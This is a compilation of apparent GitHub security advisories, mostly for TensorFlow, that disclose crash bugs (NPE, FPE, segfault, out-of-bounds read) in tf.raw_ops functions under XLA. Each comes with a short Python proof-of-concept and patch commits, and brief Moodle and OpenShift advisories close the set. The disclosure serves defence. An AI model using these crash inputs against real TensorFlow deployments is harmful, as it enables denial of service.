Source
ghsa
### Impact

The function `tf.raw_ops.LookupTableImportV2` cannot handle scalars in the `values` parameter and gives an NPE.

```python
import tensorflow as tf

v = tf.Variable(1)

@tf.function(jit_compile=True)
def test():
    func = tf.raw_ops.LookupTableImportV2
    para={'table_handle': v.handle,'keys': [62.98910140991211, 94.36528015136719], 'values': -919}
    y = func(**para)
    return y

print(test())
```

### Patches

We have patched the issue in GitHub commit [980b22536abcbbe1b4a5642fc940af33d8c19b69](https://github.com/tensorflow/tensorflow/commit/980b22536abcbbe1b4a5642fc940af33d8c19b69).

The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by r3pwnx ...

### Impact

FPE in TensorListSplit with XLA

```python
import tensorflow as tf

func = tf.raw_ops.TensorListSplit
para = {'tensor': [1], 'element_shape': -1, 'lengths': [0]}

@tf.function(jit_compile=True)
def fuzz_jit():
    y = func(**para)
    return y

print(fuzz_jit())
```

### Patches

We have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa).

The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by r3pwnx

### Impact

NPE in RandomShuffle with XLA enabled

```python
import tensorflow as tf

func = tf.raw_ops.RandomShuffle
para = {'value': 1e+20, 'seed': -4294967297, 'seed2': -2147483649}

@tf.function(jit_compile=True)
def test():
    y = func(**para)
    return y

test()
```

### Patches

We have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa).

The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by r3pwnx

### Impact

When running with XLA, `tf.raw_ops.Bincount` segfaults when given a parameter `weights` that is neither the same shape as parameter `arr` nor a length-0 tensor.

```python
import tensorflow as tf

func = tf.raw_ops.Bincount
para={'arr': 6, 'size': 804, 'weights': [52, 351]}

@tf.function(jit_compile=True)
def fuzz_jit():
    y = func(**para)
    return y

print(fuzz_jit())
```

### Patches

We have patched the issue in GitHub commit [8ae76cf085f4be26295d2ecf2081e759e04b8acf](https://github.com/tensorflow/tensorflow/commit/8ae76cf085f4be26295d2ecf2081e759e04b8acf).

The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by r3pwnx of 360 AIVul Team

### Impact

When running with XLA, `tf.raw_ops.ParallelConcat` segfaults with a nullptr dereference when given a parameter `shape` with rank that is not greater than zero.

```python
import tensorflow as tf

func = tf.raw_ops.ParallelConcat
para = {'shape': 0, 'values': [1]}

@tf.function(jit_compile=True)
def test():
    y = func(**para)
    return y

test()
```

### Patches

We have patched the issue in GitHub commit [da66bc6d5ff466aee084f9e7397980a24890cd15](https://github.com/tensorflow/tensorflow/commit/da66bc6d5ff466aee084f9e7397980a24890cd15).

The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by r3pwnx of 360 AIVul Team

### Impact

`nn_ops.fractional_avg_pool_v2` and `nn_ops.fractional_max_pool_v2` require the first and fourth elements of their parameter `pooling_ratio` to be equal to 1.0, as pooling on batch and channel dimensions is not supported.

```python
import tensorflow as tf
import os
import numpy as np
from tensorflow.python.ops import nn_ops
try:
    arg_0_tensor = tf.random.uniform([3, 30, 50, 3], dtype=tf.float64)
    arg_0 = tf.identity(arg_0_tensor)
    arg_1_0 = 2
    arg_1_1 = 3
    arg_1_2 = 1
    arg_1_3 = 1
    arg_1 = [arg_1_0,arg_1_1,arg_1_2,arg_1_3,]
    arg_2 = True
    arg_3 = True
    seed = 341261001
    out = nn_ops.fractional_avg_pool_v2(arg_0,arg_1,arg_2,arg_3,seed=seed,)
except Exception as e:
    print("Error:"+str(e))
```

### Patches

We have patched the issue in GitHub commit [ee50d1e00f81f62a4517453f721c634bbb478307](https://github.com/tensorflow/tensorflow/commit/ee50d1e00f81f62a4517453f721c634bbb478307).

The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on T...

### Impact

Constructing a tflite model with a parameter `filter_input_channel` of less than 1 gives an FPE.

### Patches

We have patched the issue in GitHub commit [34f8368c535253f5c9cb3a303297743b62442aaa](https://github.com/tensorflow/tensorflow/commit/34f8368c535253f5c9cb3a303297743b62442aaa).

The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability was reported by Wang Xuan of Qihoo 360 AIVul Team.

### Impact

Out of bounds read in GRUBlockCellGrad

```python
import tensorflow as tf
from numpy import array, float32  # names used in the parameter dict below

func = tf.raw_ops.GRUBlockCellGrad
para = {'x': [[21.1, 156.2], [83.3, 115.4]],
        'h_prev': array([[136.5], [136.6]]),
        'w_ru': array([[26.7, 0.8], [47.9, 26.1], [26.2, 26.3]]),
        'w_c': array([[ 0.4], [31.5], [ 0.6]]),
        'b_ru': array([0.1, 0.2 ], dtype=float32),
        'b_c': 0x41414141,
        'r': array([[0.3], [0.4]], dtype=float32),
        'u': array([[5.7], [5.8]]),
        'c': array([[52.9], [53.1]]),
        'd_h': array([[172.2], [188.3 ]])}
```

### Patches

We have patched the issue in GitHub commit [ff459137c2716a2a60f7d441b855fcb466d778cb](https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb).

The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security...

In Moodle, insufficient limitations in some quiz web services made it possible for students to bypass sequential navigation during a quiz attempt.
A vulnerability was found in OpenShift Assisted Installer. During generation of the Discovery ISO, image pull secrets were leaked as plaintext in the installation logs. An authenticated user could exploit this by re-using the image pull secret to pull container images from the registry as the associated user.